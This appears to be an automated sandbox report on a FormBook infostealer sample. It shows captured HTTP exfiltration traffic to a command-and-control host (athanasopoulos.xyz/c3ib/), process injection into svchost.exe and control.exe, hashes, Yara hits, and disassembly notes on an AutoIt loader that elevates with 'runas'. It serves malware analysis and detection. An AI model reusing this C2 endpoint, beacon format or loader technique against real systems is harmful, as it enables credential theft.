Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.10	49986	84.32.84.32	80	6248	C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:54:42.199033022 CET	1714	OUT	POST /c3ib/ HTTP/1.1 Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.athanasopoulos.xyz Origin: http://www.athanasopoulos.xyz Referer: http://www.athanasopoulos.xyz/c3ib/ Content-Type: application/x-www-form-urlencoded Content-Length: 1230 Cache-Control: max-age=0 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36 Data Raw: 30 6c 54 54 63 3d 59 63 39 7a 74 49 37 2f 73 55 6b 74 6e 44 6c 4c 54 73 30 39 4f 6d 58 48 74 49 38 2b 50 62 4f 6f 4a 30 79 78 65 63 41 58 45 61 77 41 31 5a 41 54 36 75 43 32 4d 76 32 64 34 31 39 49 78 42 51 61 43 64 2f 74 31 78 63 47 4b 6f 6b 45 72 30 31 74 70 53 4c 42 62 63 34 30 44 69 69 2f 77 69 50 75 51 53 56 77 31 37 7a 6e 32 67 53 66 52 51 35 78 2b 41 66 43 6d 79 64 53 7a 6b 73 78 70 66 64 56 6e 4f 51 41 34 66 55 7a 69 68 50 37 65 56 79 63 57 44 71 68 4f 34 6d 59 6b 46 6c 44 76 44 44 68 75 72 30 6e 65 42 6a 57 51 32 5a 68 36 79 48 56 51 4d 64 53 4d 71 4a 2f 7a 55 33 4f 75 71 6f 4b 61 61 41 61 38 35 54 6c 59 51 54 5a 5a 51 6e 63 37 50 4b 4b 46 4a 64 69 64 4d 2f 71 61 39 67 66 54 66 63 51 66 50 36 30 2b 70 30 4b 6a 72 64 38 75 62 46 77 4b 67 6a 62 53 66 42 41 41 51 72 7a 66 42 7a 2f 4f 59 73 34 70 75 45 4f 44 69 5a 2b 50 74 30 38 54 79 44 79 6b 34 61 45 49 61 6e 6a 4f 75 75 54 38 73 69 48 67 44 59 43 34 79 71 55 37 6c 31 50 64 75 2f 57 70 51 46 50 4f 7a 65 55 51 36 57 6a 78 6b 44 6c 36 36 51 4d [TRUNCATED] Data Ascii: 0lTTc=Yc9ztI7/sUktnDlLTs09OmXHtI8+PbOoJ0yxecAXEawA1ZAT6uC2Mv2d419IxBQaCd/t1xcGKokEr01tpSLBbc40Dii/wiPuQSVw17zn2gSfRQ5x+AfCmydSzksxpfdVnOQA4fUzihP7eVycWDqhO4mYkFlDvDDhur0neBjWQ2Zh6yHVQMdSMqJ/zU3OuqoKaaAa85TlYQTZZQnc7PKKFJdidM/qa9gfTfcQfP60+p0Kjrd8ubFwKgjbSfBAAQrzfBz/OYs4puEODiZ+Pt08TyDyk4aEIanjOuuT8siHgDYC4yqU7l1Pdu/WpQFPOzeUQ6WjxkDl66QMW6x5LPwfuQyCc1D+paZLDPReqBNCliluvTgA93z+jY2+8CNS0AGnD3Z/VbfVfj9I44jkrxHRV3Yqkb6ul3YycLvHwv/CXNUxIjslsvjRSFN1bTCp7K+T2w6qJDffOpvrjO9s29UGMxXfmLknWHUDYHWRCbmEBY3L1gcBLSS0ltPR+mqhUFfhUwenbyKCPNiVUNdbhpnPhxSllbZ8xiv9xN8kOiLu2s6bUcsgP47CmkQ1fbNzboRXg8PKn6DQSEMMGr2ol9yjXxQD87d8J7z2QzbEgpNa3+w25hLdxyStrlBOAJZyIIUbXDXQDCltONKn+uYLqFUd5I1tCEKtDL9EIyDFgnmjapKTfxZiRSo6PD2w/hMDXgokfwftNy92t9G4mdqCyVi3stTG0/WiAkd2WIXB5Jq8ag0f8wolRlQKv/3ZmI7w4CGDJCj43pUAWwGkQXbphEtUxrdp58f9FAuH+qh722kRXFLN6JTb5s41xpInshVzYMay4NeNccZJOSdcdmlBmJZG1tNkh01llEL62F/zaw+pVJUXSbeyBRvuqfLow3WutPjz0vudMQQ7ZSnMRnGbJKVzMuwCLB3/B4NwTL2u2TCiLqGPLYqYduWfSrSnzBfjQLPkexMs6h6boQ62GFFuHz43Alz6PglUbNrs71b3bR+ze9pHU4 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.10	49987	84.32.84.32	80	6248	C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:54:44.736860991 CET	401	OUT	GET /c3ib/?0lTTc=VeVTu/fHsmAIsnghWeASOCbVs5MMPZeLEFuxWqcNIO4v3qxzm9KoM8zNhlg+xGg6CPSRvT5qIZglpWcl4xCUdeIDLz6/vwrtfjRi1ZSt7jG1PChEqw==&LR=KBvPk HTTP/1.1 Accept: / Accept-Language: en-US,en;q=0.9 Host: www.athanasopoulos.xyz Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
Jan 11, 2025 02:54:45.193135023 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 01:54:45 GMT Content-Type: text/html Content-Length: 9973 Connection: close Vary: Accept-Encoding Server: hcdn alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 9afcf731ab2b78a85b312dc22cf1ec21-bos-edge1 Expires: Sat, 11 Jan 2025 01:54:44 GMT Cache-Control: no-cache Accept-Ranges: bytes Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED] Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
Jan 11, 2025 02:54:45.193166018 CET	1236	IN	Data Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
Jan 11, 2025 02:54:45.193177938 CET	1236	IN	Data Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
Jan 11, 2025 02:54:45.193190098 CET	672	IN	Data Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
Jan 11, 2025 02:54:45.193459988 CET	1236	IN	Data Raw: 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 3d 77 69 Data Ascii: ync></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer\|\|[],gtag("js",new Date),gtag("config","UA-26575989-44")</script><nav class="navbar navbar-inverse"><div class=container-fluid style="padding:0 32p
Jan 11, 2025 02:54:45.193471909 CET	1236	IN	Data Raw: 2d 61 63 63 6f 75 6e 74 2d 70 61 67 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6e 74 61 69 6e 65 72 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 Data Ascii: -account-page><div class=container><div class="col-xs-12 top-container"><div class=message><h2 id=pathName><i></i></h2><div class=message-subtitle>Happy to see your domain with Hostinger!</div><p>Your domain is active and is using Hostinger na
Jan 11, 2025 02:54:45.193483114 CET	1236	IN	Data Raw: 66 6f 6c 6c 6f 77 3e 41 64 64 20 61 20 77 65 62 73 69 74 65 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77 Data Ascii: follow>Add a website</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Change domain nameservers</div><br><p>Manage your domain nameservers in the domain management page of your
Jan 11, 2025 02:54:45.193533897 CET	1236	IN	Data Raw: 2b 33 38 29 29 7d 74 68 69 73 2e 64 65 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 61 2c 68 2c 66 2c 69 2c 63 2c 75 2c 64 2c 6c 2c 70 2c 67 2c 73 2c 43 2c 77 2c 76 2c 6d 3d 5b 5d 2c 79 3d 5b 5d 2c 45 3d 65 2e 6c 65 6e 67 Data Ascii: +38))}this.decode=function(e,t){var a,h,f,i,c,u,d,l,p,g,s,C,w,v,m=[],y=[],E=e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal i
Jan 11, 2025 02:54:45.193547010 CET	988	IN	Data Raw: 28 6d 2d 3d 28 6d 2d 39 37 3c 32 36 29 3c 3c 35 29 2b 28 28 21 77 5b 64 5d 26 26 6d 2d 36 35 3c 32 36 29 3c 3c 35 29 29 3a 74 5b 64 5d 29 29 3b 66 6f 72 28 69 3d 63 3d 79 2e 6c 65 6e 67 74 68 2c 30 3c 63 26 26 79 2e 70 75 73 68 28 22 2d 22 29 3b Data Ascii: (m-=(m-97<26)<<5)+((!w[d]&&m-65<26)<<5)):t[d]));for(i=c=y.length,0<c&&y.push("-");i<v;){for(l=r,d=0;d<v;++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if

Target ID:	0
Start time:	20:52:38
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\5by4QM3v89.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\5by4QM3v89.exe"
Imagebase:	0x390000
File size:	1'225'728 bytes
MD5 hash:	6C05E87405D63CB15D69816ADABE9910
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	20:52:42
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\5by4QM3v89.exe"
Imagebase:	0x1f0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1841070035.0000000006FB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1838306488.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1838875219.00000000034E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	20:53:19
Start date:	10/01/2025
Path:	C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe"
Imagebase:	0xfe0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2626629633.00000000029E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	20:53:21
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\control.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\control.exe"
Imagebase:	0xa00000
File size:	149'504 bytes
MD5 hash:	EBC29AA32C57A54018089CFC9CACAFE8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2618010290.0000000002AF0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2626863347.00000000047B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2626768176.0000000004760000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	20:53:34
Start date:	10/01/2025
Path:	C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe"
Imagebase:	0xfe0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2623602119.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	20:53:46
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff613480000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	1.5%
Signature Coverage:	6.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	61

Executed Functions

Function 00393B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00393B68
IsDebuggerPresent.KERNEL32 ref: 00393B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,004552F8,004552E0,?,?), ref: 00393BEB

Part of subcall function 00397BCC: _memmove.LIBCMT ref: 00397C06

Part of subcall function 003A092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00393C14,004552F8,?,?,?), ref: 003A096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00393C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00447770,00000010), ref: 003CD281
SetCurrentDirectoryW.KERNEL32(?,004552F8,?,?,?), ref: 003CD2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00444260,004552F8,?,?,?), ref: 003CD33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 003CD346

Part of subcall function 00393A46: GetSysColorBrush.USER32(0000000F), ref: 00393A50
Part of subcall function 00393A46: LoadCursorW.USER32(00000000,00007F00), ref: 00393A5F
Part of subcall function 00393A46: LoadIconW.USER32(00000063), ref: 00393A76
Part of subcall function 00393A46: LoadIconW.USER32(000000A4), ref: 00393A88
Part of subcall function 00393A46: LoadIconW.USER32(000000A2), ref: 00393A9A
Part of subcall function 00393A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00393AC0
Part of subcall function 00393A46: RegisterClassExW.USER32(?), ref: 00393B16

Part of subcall function 003939D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00393A03
Part of subcall function 003939D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00393A24
Part of subcall function 003939D5: ShowWindow.USER32(00000000,?,?), ref: 00393A38
Part of subcall function 003939D5: ShowWindow.USER32(00000000,?,?), ref: 00393A41

Part of subcall function 0039434A: _memset.LIBCMT ref: 00394370
Part of subcall function 0039434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00394415

Strings

%B, xrefs: 00393C44
This is a third-party compiled AutoIt script., xrefs: 003CD279
runas, xrefs: 003CD33A

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas$%B
API String ID: 529118366-814997577
Opcode ID: aff78624423f6ae401cf7b4395441562becc1d29d9099a88fbee35eb95115cab
Instruction ID: 64babfe9cf5ea2b5a2084863c2833cccb2793763b369e95786cc15dab799c523
Opcode Fuzzy Hash: aff78624423f6ae401cf7b4395441562becc1d29d9099a88fbee35eb95115cab
Instruction Fuzzy Hash: 8551E671908608AADF13EBB4DC15EFD7B78AF45701F0040B9F851AA1A2DB749A46CF25

Function 003949A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 003949CD

Part of subcall function 00397BCC: _memmove.LIBCMT ref: 00397C06

GetCurrentProcess.KERNEL32(?,0041FAEC,00000000,00000000,?), ref: 00394A9A
IsWow64Process.KERNEL32(00000000), ref: 00394AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00394AE7
FreeLibrary.KERNEL32(00000000), ref: 00394AF2
GetSystemInfo.KERNEL32(00000000), ref: 00394B23
GetSystemInfo.KERNEL32(00000000), ref: 00394B2F

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 7037693efff0dfe0c039c16f1ddddfffcfeeb0ca782642ea80a791a3bb064c02
Instruction ID: b376e1e1fa1ef05849f092bdfc0f7b817d91abe6bbad9bcf1c797103ee89c16f
Opcode Fuzzy Hash: 7037693efff0dfe0c039c16f1ddddfffcfeeb0ca782642ea80a791a3bb064c02
Instruction Fuzzy Hash: 5091C7319897C0DECB32DB788550AAAFFF5AF2A300B4449ADE0C797A41D234E909C75D

Function 00394E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00394D8E,?,?,00000000,00000000), ref: 00394E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00394D8E,?,?,00000000,00000000), ref: 00394EB0
LoadResource.KERNEL32(?,00000000,?,?,00394D8E,?,?,00000000,00000000,?,?,?,?,?,?,00394E2F), ref: 003CD937
SizeofResource.KERNEL32(?,00000000,?,?,00394D8E,?,?,00000000,00000000,?,?,?,?,?,?,00394E2F), ref: 003CD94C
LockResource.KERNEL32(00394D8E,?,?,00394D8E,?,?,00000000,00000000,?,?,?,?,?,?,00394E2F,00000000), ref: 003CD95F

Strings

SCRIPT, xrefs: 00394EA6

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 435da7c36ca698b6cac43a1856464b286d8a149349d05d3af8a64e60a613b935
Instruction ID: ca2b9deab4c08a28a5999f815664dceac0c04fb57ce9954e1882d2afcc9ba410
Opcode Fuzzy Hash: 435da7c36ca698b6cac43a1856464b286d8a149349d05d3af8a64e60a613b935
Instruction Fuzzy Hash: 37114C75640700ABDB218B65EC48F677BBAEBC5B51F208278F40586250DB71EC068665

Function 0039FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON

Download Yara Rule

Strings

%B, xrefs: 0039FCF3
pbE, xrefs: 003D49B9

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: BuffCharUpper
String ID: pbE$%B
API String ID: 3964851224-1549336217
Opcode ID: 640933424c28822ae1ea91a6b9fbc840d62bdd670308befa7063bf34fe827326
Instruction ID: 7aa1a0952a98fb1641712f688b978c6f3c363335e8c78cf491b6ce720bf7b0ae
Opcode Fuzzy Hash: 640933424c28822ae1ea91a6b9fbc840d62bdd670308befa7063bf34fe827326
Instruction Fuzzy Hash: BA928D75A083418FD726DF14C480B2AB7E4FF86304F15896EE88A9B361D775EC45CB92

Function 0039E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON

Download Yara Rule

Strings

DdE, xrefs: 0039EAC1
Variable must be of type 'Object'., xrefs: 003D3E62
DdE, xrefs: 0039EABA
DdE, xrefs: 003D3B2E
DdE, xrefs: 003D3AF5

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID:
String ID: DdE$DdE$DdE$DdE$Variable must be of type 'Object'.
API String ID: 0-847692887
Opcode ID: e5472ecec7943bbd1c0ffce4b4212fab6bb279189e956ae0ffdc93671d208312
Instruction ID: fa75cc77ef1a495e3a05d4f2b77ce72128807478188fc7fc52b91c9a25a79bf1
Opcode Fuzzy Hash: e5472ecec7943bbd1c0ffce4b4212fab6bb279189e956ae0ffdc93671d208312
